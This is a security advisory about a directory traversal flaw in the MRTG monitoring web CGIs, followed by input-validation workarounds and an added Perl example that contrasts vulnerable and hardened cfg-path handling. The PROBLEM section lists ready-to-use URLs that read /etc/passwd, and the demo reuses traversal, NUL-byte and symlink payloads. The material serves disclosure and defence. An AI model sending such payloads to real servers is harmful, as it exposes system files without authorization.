
mrtg monitoring web interface may be fooled to read system files



3rd Feb 2002 [SBWID-5059]
COMMAND

	mrtg monitoring web interface may be fooled to read system files

SYSTEMS AFFECTED

	MRTG 2.9.18pre1 and previous (affected range unconfirmed at the time of writing)

PROBLEM

	UkR-XblP of the UkR security team reported:
	

	The following is self-explanatory -
	

	http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd

	http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd

	http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd

	http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd

	

SOLUTION

	Patch announced as available soon (unconfirmed at the time of writing):
	 

	http://www.mrtg.org

	

	Workaround, parse input (note that the square brackets make this a
	character class, so the substitution strips every single '.', '/', '(',
	')' and '|' character from the name rather than only the '..' sequence;
	it blocks the traversal but also mangles a legitimate name such as
	mrtg.cfg into mrtgcfg):
	 

	$input =~ s/[(\.\.)|\/]//g;

	

	

	Update (04 February 2002) "SJ" proposed:
	

	use CGI;                 # assumed: the CGI reads its parameters through CGI.pm
	my $q = CGI->new;
	my $SECMSG = "Pliz dont hekk us\n";

	
	if(!defined $q->param('cfg')){ die "missing cfg file\n"; }

	my $xx = $q->param('cfg');

	
	# reject the '..', '//' and './' sequences outright
	if($xx =~ /\.\.|\/\/|\.\//){ die $SECMSG; }

	# tr///dc deletes and counts every character outside [a-zA-Z0-9_-];
	# a non-zero count rejects the request, so a name containing a dot
	# (e.g. mrtg.cfg) is refused by this rule as well
	if($xx =~ tr/a-zA-Z0-9_\-//dc){ die $SECMSG; }

	

	You could also check the ownership of $cfgfile and deny opening root
	(and maybe other) owned files.
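
	The traversal shown in the PROBLEM section and the input checks proposed
	above, worked through as an added example; this is not MRTG's own code
	and not code from either poster. It assumes a config directory (here a
	temporary one populated with a constructed mrtg.cfg and a planted
	symlink) and places the vulnerable path construction next to a resolver
	that first allow-lists the file name and then confirms the realpath()
	result still lies under that directory, so '..', NUL bytes and symlinks
	pointing out of the tree are all rejected while a dotted name such as
	mrtg.cfg is still accepted.

```perl
#!/usr/bin/perl
# Added example, not MRTG code: the vulnerable cfg lookup beside a hardened one.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);

# --- vulnerable pattern (what the advisory URLs exploit) -------------------
# The request parameter is glued onto the config directory, so a value of
# ../../../../../../../../etc/passwd simply walks back up to the root.
sub cfg_path_vulnerable {
    my ($cfg_dir, $cfg) = @_;
    return "$cfg_dir/$cfg";
}

# --- hardened resolver ------------------------------------------------------
# Returns the canonical path of the requested file or dies with a reason.
sub resolve_cfg {
    my ($cfg_dir, $cfg) = @_;
    die "missing cfg parameter\n" unless defined $cfg && length $cfg;

    # 1. Syntactic allow-list: a bare file name made of [A-Za-z0-9_.-] that
    #    does not start with '.', so no separators, no NUL and no '.hidden';
    #    '..' is refused separately so that 'a..b' cannot slip through.
    die "cfg contains disallowed characters\n"
        unless $cfg =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]*\z/;
    die "cfg may not contain ..\n" if $cfg =~ /\.\./;

    # 2. Semantic check: resolve symlinks and confirm the result is still
    #    inside the canonical config directory.  This also catches a
    #    validly named file that is really a symlink to /etc/passwd.
    my $base = realpath($cfg_dir)
        or die "config directory $cfg_dir does not exist\n";
    my $path = realpath(File::Spec->catfile($base, $cfg));
    die "no such cfg file\n" unless defined $path && -f $path;
    my $prefix = ($base eq '/') ? '/' : "$base/";
    die "cfg resolves outside $base\n" unless index($path, $prefix) == 0;

    return $path;
}

# --- demonstration on a constructed config directory ------------------------
my $dir = tempdir(CLEANUP => 1);                     # assumed config dir
open(my $fh, '>', "$dir/mrtg.cfg") or die "cannot create sample cfg: $!\n";
print $fh "WorkDir: /var/www/mrtg\n";                # constructed sample content
close $fh;
symlink('/etc/passwd', "$dir/evil.cfg")              # planted symlink out of the tree
    or warn "symlink not created (unsupported here)\n";

my @requests = (
    'mrtg.cfg',                                  # legitimate
    '../../../../../../../../etc/passwd',        # the advisory's payload
    'mrtg.cfg/../../../etc/passwd',              # traversal after a valid name
    "mrtg.cfg\0.txt",                            # NUL byte truncation attempt
    'evil.cfg',                                  # passes the allow-list, fails realpath check
);

for my $cfg (@requests) {
    (my $shown = $cfg) =~ s/\0/\\0/g;            # make the NUL visible when printed
    (my $vpath = cfg_path_vulnerable($dir, $cfg)) =~ s/\0/\\0/g;
    printf "%-40s vulnerable -> %s\n", $shown, $vpath;
    my $ok = eval { resolve_cfg($dir, $cfg) };
    printf "%-40s hardened   -> %s", '', defined $ok ? "OK: $ok\n" : "REJECTED: $@";
}
```

	The allow-list alone would already stop every URL in the PROBLEM
	section; the realpath() prefix check is what additionally protects
	against a symlink (or a later configuration change) that makes an
	innocently named file resolve outside the config directory.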

